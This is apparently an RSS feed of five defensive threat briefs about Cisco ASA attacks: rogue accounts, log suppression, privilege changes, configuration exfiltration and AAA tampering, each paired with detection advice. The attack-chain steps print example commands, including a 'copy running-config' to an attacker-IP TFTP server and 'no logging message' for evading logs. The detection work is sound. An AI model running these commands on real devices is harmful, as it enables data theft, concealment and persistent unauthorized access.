<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Cisco-Asa - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/cisco-asa/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Thu, 04 Jan 2024 12:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/cisco-asa/feed.xml" rel="self" type="application/rss+xml"/><item><title>Cisco ASA - New Local User Account Creation</title><link>https://feed.craftedsignal.io/briefs/2024-01-04-cisco-asa-account-creation/</link><pubDate>Thu, 04 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-04-cisco-asa-account-creation/</guid><description>Detection of new user account creations on Cisco ASA devices, potentially indicating unauthorized access or persistence attempts by adversaries.</description><content:encoded><![CDATA[<p>This analytic detects the creation of new user accounts on Cisco ASA devices via CLI or ASDM. Adversaries may create unauthorized user accounts to establish persistence, maintain backdoor access, or elevate privileges on network infrastructure devices. These rogue accounts can provide attackers with continued access even after initial compromise vectors are remediated. The detection monitors for ASA message ID 502101, which is generated whenever a new user account is created on the device, capturing details including the username, privilege level, and the administrator who created the account. The source material was published by Splunk on 2026-04-17, highlighting the continued relevance of this threat.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial access to the Cisco ASA device via compromised credentials or exploitation of a vulnerability.</li>
<li>Attacker authenticates to the ASA device using the gained access.</li>
<li>Attacker executes commands to create a new local user account using the CLI or ASDM interface.</li>
<li>The ASA device generates syslog message ID 502101, indicating the new account creation, which includes the username, privilege level, and creating administrator.</li>
<li>The attacker assigns a high privilege level (e.g., level 15) to the new account.</li>
<li>Attacker uses the newly created account to maintain persistent access to the ASA device.</li>
<li>Attacker leverages the persistent access to perform reconnaissance, modify configurations, or disrupt network operations.</li>
<li>The attacker establishes a backdoor for future access, bypassing normal authentication mechanisms.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to unauthorized access to the network infrastructure, allowing attackers to modify configurations, intercept traffic, or disrupt services. This can result in data breaches, denial of service, and significant financial and reputational damage. While the specific number of victims or targeted sectors isn't available, the impact is significant for any organization relying on Cisco ASA devices for network security.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Ensure Cisco ASA devices are configured to generate and forward syslog message ID 502101 to a SIEM for monitoring to enable the provided detections.</li>
<li>Implement the provided Sigma rule <code>Cisco ASA - New Local User Account Created</code> to detect suspicious account creation activities.</li>
<li>Investigate any alerts generated by the Sigma rule, paying close attention to accounts with elevated privileges (level 15) and those created outside of normal business hours.</li>
<li>Review existing user accounts on Cisco ASA devices regularly, looking for any unauthorized or suspicious accounts.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cisco-asa</category><category>account-creation</category><category>persistence</category></item><item><title>Cisco ASA Logging Message Suppression</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-logging-suppression/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-logging-suppression/</guid><description>Adversaries may suppress specific log message IDs on Cisco ASA devices using the 'no logging message' command to selectively disable logging of security-critical events and evade detection.</description><content:encoded><![CDATA[<p>This detection focuses on identifying the suppression of logging messages within Cisco ASA devices, a tactic used by adversaries to evade detection. Attackers leverage the &quot;no logging message&quot; command to selectively disable the logging of specific, security-critical events, such as authentication failures, configuration changes, or suspicious network activity. This approach allows them to maintain a degree of stealth while still allowing other logging functions to proceed normally, avoiding suspicion that might be raised by a complete disabling of logging. The detection specifically monitors for the execution of commands with message IDs 111008 and 111010 that include the &quot;no logging message&quot; command, which can suppress message IDs irrespective of the configured severity level. Identifying unauthorized or suspicious use of this command is crucial for maintaining auditability and detecting malicious activity within the network environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains unauthorized access to a Cisco ASA device, potentially through stolen credentials or exploiting a vulnerability.</li>
<li>The attacker executes the command <code>enable</code> to enter privileged EXEC mode.</li>
<li>The attacker then enters global configuration mode using the <code>configure terminal</code> command.</li>
<li>The attacker identifies security-critical message IDs, such as those related to authentication failures or configuration changes.</li>
<li>The attacker uses the <code>no logging message &lt;message_id&gt;</code> command to suppress logging for these specific message IDs. For example, <code>no logging message 111008</code>.</li>
<li>The ASA device ceases to log events associated with the suppressed message IDs, effectively hiding the attacker's actions.</li>
<li>The attacker performs malicious actions on the network, knowing that these actions will not be logged.</li>
<li>The attacker exits configuration mode and privileged EXEC mode, leaving the ASA device with suppressed logging.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful suppression of logging messages can severely hinder incident response and forensic investigations. If critical security events are not logged, administrators will be unaware of malicious activities occurring on the network. This can lead to delayed detection of breaches, data exfiltration, or other significant security incidents. The NCSC report referenced in the related articles details the use of similar techniques by advanced persistent threat (APT) groups to maintain persistence and evade detection on compromised systems, which highlights the potential impact of this tactic.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Cisco ASA syslog data ingestion into your SIEM using the Cisco Security Cloud TA, as required by the detection [How To Implement].</li>
<li>Configure Cisco ASA devices to generate and forward message IDs 111008 and 111010, or adjust the logging level to include these messages if needed [How To Implement].</li>
<li>Deploy the Sigma rule &quot;Cisco ASA Logging Message Suppression Detected&quot; to identify instances of logging message suppression [rules].</li>
<li>Investigate any detected instances of message suppression, focusing on unauthorized suppressions of security-critical message IDs, suppressions by non-administrative accounts, and suppressions occurring during unusual hours [description].</li>
<li>Establish a baseline of approved suppressed message IDs and monitor for deviations from this baseline [known_false_positives].</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cisco-asa</category><category>logging</category><category>defense-evasion</category><category>network</category></item><item><title>Cisco ASA User Privilege Level Change Detection</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-privilege-escalation/</link><pubDate>Wed, 03 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-privilege-escalation/</guid><description>Detection of unauthorized privilege level changes on Cisco ASA devices, potentially indicating privilege escalation or persistence attempts by threat actors.</description><content:encoded><![CDATA[<p>This threat brief focuses on the detection of unauthorized privilege level modifications on Cisco ASA (Adaptive Security Appliance) devices. Threat actors may attempt to escalate privileges to gain elevated access to network infrastructure, enable additional command execution capabilities, or establish higher-level persistent access. This is achieved by modifying user account privilege levels, which range from 0 (lowest) to 15 (full administrative access). The detection strategy leverages Cisco ASA message ID 502103, triggered when a user account's privilege level is modified. This event captures crucial information, including the username, the administrator responsible for the change, and both the original and the new privilege levels. Defenders should investigate unexpected privilege changes, with particular attention to escalations to level 15, substantial privilege increases, modifications performed outside of established business hours, changes initiated by non-administrative users, or changes lacking proper change management documentation.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> An attacker gains initial access to a low-privilege user account on the Cisco ASA, possibly through compromised credentials or social engineering.</li>
<li><strong>Reconnaissance:</strong> The attacker uses the compromised account to enumerate existing user accounts and their current privilege levels using CLI commands like <code>show user</code>.</li>
<li><strong>Privilege Escalation Attempt:</strong> The attacker attempts to modify the privilege level of a target account (potentially their own) using commands like <code>username &lt;user&gt; privilege &lt;level&gt;</code> via CLI or ASDM.</li>
<li><strong>Authentication:</strong> The ASA requires authentication for the privilege escalation attempt, often requiring administrator credentials. The attacker might attempt to brute-force or bypass this authentication.</li>
<li><strong>Privilege Level Change:</strong> If successful, the attacker elevates the target account's privilege level. Message ID 502103 is generated, logging the change.</li>
<li><strong>Command Execution:</strong> With elevated privileges, the attacker can now execute privileged commands, modify network configurations, and potentially compromise the entire ASA device.</li>
<li><strong>Persistence:</strong> The attacker may create new high-privilege accounts or modify existing ones to ensure continued access, even if the initial compromised account is discovered and disabled.</li>
<li><strong>Lateral Movement:</strong> The attacker uses the compromised ASA as a pivot point to gain access to other systems on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised Cisco ASA devices can lead to significant damage, including unauthorized network access, data breaches, and disruption of network services. A successful privilege escalation can grant attackers complete control over the network infrastructure. The NCSC's analysis of RayInitiator/LINE-VIPER malware highlights the potential for attackers to leverage compromised network devices for lateral movement and data exfiltration. The scope of impact depends on the organization's size and the criticality of the network services provided by the ASA.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable and forward Cisco ASA syslog data, including message ID 502103, to your SIEM using the Cisco Security Cloud TA, as required by the detection rules below.</li>
<li>Deploy the provided Sigma rule <code>Cisco ASA User Privilege Level Change Detected</code> to detect privilege level changes and tune it for your environment.</li>
<li>Investigate any alerts generated by the Sigma rule, paying close attention to escalations to privilege level 15, substantial increases in privilege levels, and changes made outside of normal business hours.</li>
<li>Correlate privilege level change events (message ID 502103) with other security events, such as failed login attempts or suspicious network activity, to identify potential compromise.</li>
<li>Regularly review user accounts and their privilege levels on Cisco ASA devices.</li>
<li>Implement strong password policies and multi-factor authentication for all ASA administrator accounts.</li>
<li>Refer to the Cisco documentation linked in the references to configure and monitor ASA logging effectively.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cisco-asa</category><category>privilege-escalation</category><category>persistence</category><category>network</category></item><item><title>Cisco ASA Device File Copy to Remote Location</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-file-copy/</link><pubDate>Wed, 03 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-file-copy/</guid><description>The analytic detects file copy operations from Cisco ASA devices to remote locations using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP, potentially indicating data exfiltration by threat actors targeting network devices.</description><content:encoded><![CDATA[<p>This detection identifies file copy operations from Cisco ASA devices to remote locations, which could signal data exfiltration attempts. Threat actors targeting network infrastructure may attempt to exfiltrate sensitive data, including device configurations, logs, and packet captures, to attacker-controlled infrastructure. The analytic focuses on detecting unusual copy commands executed via the CLI or ASDM interface. Specifically, it monitors Cisco ASA logs (message IDs 111008 and 111010) for copy commands using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP. Legitimate backups to centralized servers are common, however copies to unexpected or external destinations are suspicious. This activity is associated with threat actors targeting perimeter network devices, like the ArcaneDoor campaign. Defenders should investigate copies to unexpected destinations, from non-administrative accounts, or outside approved maintenance windows.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to the Cisco ASA device, possibly through compromised credentials or exploiting a vulnerability.</li>
<li>Attacker authenticates to the ASA device via SSH, Telnet, CLI, or ASDM.</li>
<li>Attacker executes commands to copy sensitive files, such as the running configuration (<code>running-config</code>) or startup configuration (<code>startup-config</code>).</li>
<li>The <code>copy</code> command is used with a remote protocol (TFTP, FTP, HTTP, HTTPS, SMB, SCP) to specify the destination server. For example, <code>copy running-config tftp://&lt;attacker_ip&gt;/config.txt</code>.</li>
<li>The ASA device initiates a network connection to the attacker-controlled server using the specified protocol.</li>
<li>The sensitive file is transferred to the remote server.</li>
<li>Attacker uses exfiltrated data to gain further knowledge of the network environment or for malicious purposes.</li>
<li>The attacker attempts to remove evidence of the file copy operation from the ASA device's logs.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exfiltration of Cisco ASA device configurations and logs can provide attackers with valuable information about network topology, security policies, usernames, passwords and other sensitive data. This information can be used to facilitate further attacks, such as lateral movement within the network, compromising additional systems, or gaining unauthorized access to sensitive resources. Organizations in any sector could be affected if their perimeter security devices are compromised.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Cisco ASA syslog logging and ensure message IDs 111008 and 111010 are captured to enable this detection.</li>
<li>Deploy the Sigma rule <code>Cisco ASA - Device File Copy to Remote Location</code> to your SIEM and tune the filters to exclude known legitimate backup activities.</li>
<li>Investigate any alerts generated by the Sigma rule, paying close attention to the destination IP address, user account, and time of the activity.</li>
<li>Monitor network traffic for connections originating from Cisco ASA devices to external IP addresses using file transfer protocols (TFTP, FTP, HTTP, HTTPS, SMB, SCP).</li>
<li>Review and restrict access to Cisco ASA devices, enforcing strong password policies and multi-factor authentication to prevent unauthorized access.</li>
<li>Implement network segmentation to limit the impact of a compromised ASA device.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cisco-asa</category><category>data-exfiltration</category><category>network-device</category></item><item><title>Cisco ASA AAA Policy Tampering</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-cisco-aaa-tampering/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-cisco-aaa-tampering/</guid><description>Unauthorized modifications to Cisco ASA AAA policies via CLI or ASDM can weaken authentication mechanisms, potentially enabling brute-force attacks, privilege escalation, and persistent access by malicious actors.</description><content:encoded><![CDATA[<p>This brief addresses the threat of unauthorized modifications to Authentication, Authorization, and Accounting (AAA) policies on Cisco Adaptive Security Appliance (ASA) devices. Attackers, including malicious insiders, may leverage CLI or ASDM to tamper with AAA settings. The modifications can weaken authentication mechanisms, disable account lockout policies, or elevate privileges. The goal is to facilitate brute-force attacks, maintain persistent access, and potentially compromise the entire network. This activity is typically observed through Cisco ASA syslog data, specifically monitoring command execution events related to AAA policy changes. This attack matters to defenders because a compromised ASA can grant an attacker complete control over the network perimeter.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial Access: An attacker gains initial access to the Cisco ASA's CLI or ASDM, potentially through compromised credentials or exploiting a vulnerability.</li>
<li>Authentication Policy Modification: The attacker modifies AAA authentication policies using commands like <code>aaa authentication</code>, potentially increasing the maximum failed login attempts or disabling account lockout.</li>
<li>Authorization Policy Modification: The attacker modifies AAA authorization policies with commands like <code>aaa authorization</code>, escalating privileges for specific user accounts or groups to gain administrative access.</li>
<li>Local Authentication Tampering: The attacker modifies the local authentication database on the ASA with commands like <code>aaa local authentication</code>, creating new privileged accounts or modifying existing ones.</li>
<li>AAA Server Configuration Changes: The attacker alters AAA server configurations using commands like <code>aaa-server</code>, redirecting authentication requests to a malicious AAA server controlled by the attacker.</li>
<li>Disabling AAA: The attacker disables AAA features entirely using <code>no aaa</code> commands, bypassing all authentication and authorization controls.</li>
<li>Persistence: The attacker establishes persistent access by creating or modifying user accounts with elevated privileges, or by maintaining unauthorized access via weakened authentication policies.</li>
<li>Lateral Movement &amp; Data Exfiltration: With elevated privileges, the attacker moves laterally within the network, accessing sensitive data and exfiltrating it to an external location.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised AAA policies can lead to significant security breaches. An attacker can gain unauthorized access to sensitive network resources, exfiltrate confidential data, and disrupt critical business operations. Success could allow a malicious actor to pivot within the network, potentially impacting thousands of systems and resulting in substantial financial losses. This attack can severely damage an organization's reputation and erode customer trust.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Cisco ASA syslog data ingestion into your SIEM via the Cisco Security Cloud TA, ensuring message IDs 111008 and 111010 are included in the logs.</li>
<li>Deploy the provided Sigma rules to your SIEM to detect suspicious AAA policy modifications.</li>
<li>Review and harden AAA policies on Cisco ASA devices regularly, enforcing strong password policies, account lockout thresholds, and multi-factor authentication where possible (reference: <a href="https://www.cisco.com/c/en/us/td/docs/security/asa/asa-cli-reference/A-H/asa-command-ref-A-H/aa-ac-commands.html)">https://www.cisco.com/c/en/us/td/docs/security/asa/asa-cli-reference/A-H/asa-command-ref-A-H/aa-ac-commands.html)</a>.</li>
<li>Investigate any unauthorized modifications to AAA policies, focusing on changes that weaken security posture, and compare these changes against approved change management processes (see description field).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cisco-asa</category><category>aaa-policy</category><category>privilege-escalation</category><category>persistence</category></item></channel></rss>